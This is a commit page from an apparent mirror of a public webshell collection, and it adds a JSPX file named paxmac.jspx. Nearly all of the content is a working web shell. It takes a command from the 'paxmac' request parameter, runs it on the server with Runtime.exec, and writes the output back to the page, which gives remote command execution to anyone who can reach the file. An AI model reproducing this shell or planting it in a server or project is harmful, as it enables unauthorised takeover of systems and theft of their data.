mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
uodate jspx
This commit is contained in:
parent
05050cdc71
commit
70d86a1fec
1 changed files with 35 additions and 0 deletions
35
jsp/paxmac.jspx
Normal file
35
jsp/paxmac.jspx
Normal file
|
@ -0,0 +1,35 @@
|
|||
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
|
||||
xmlns="http://www.w3.org/1999/xhtml"
|
||||
xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
|
||||
<jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
|
||||
<jsp:directive.page import="java.io.*"/>
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>jspx</title>
|
||||
</head>
|
||||
<body>
|
||||
<jsp:scriptlet>
|
||||
try {
|
||||
String cmd = request.getParameter("paxmac");
|
||||
if (cmd !=null){
|
||||
Process child = Runtime.getRuntime().exec(cmd);
|
||||
InputStream in = child.getInputStream();
|
||||
int c;
|
||||
while ((c = in.read()) != -1) {
|
||||
out.print((char)c);
|
||||
}
|
||||
in.close();
|
||||
try {
|
||||
child.waitFor();
|
||||
} catch (InterruptedException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
} catch (IOException e) {
|
||||
System.err.println(e);
|
||||
}
|
||||
</jsp:scriptlet>
|
||||
</body>
|
||||
</html>
|
||||
</jsp:root>
|
Loading…
Reference in a new issue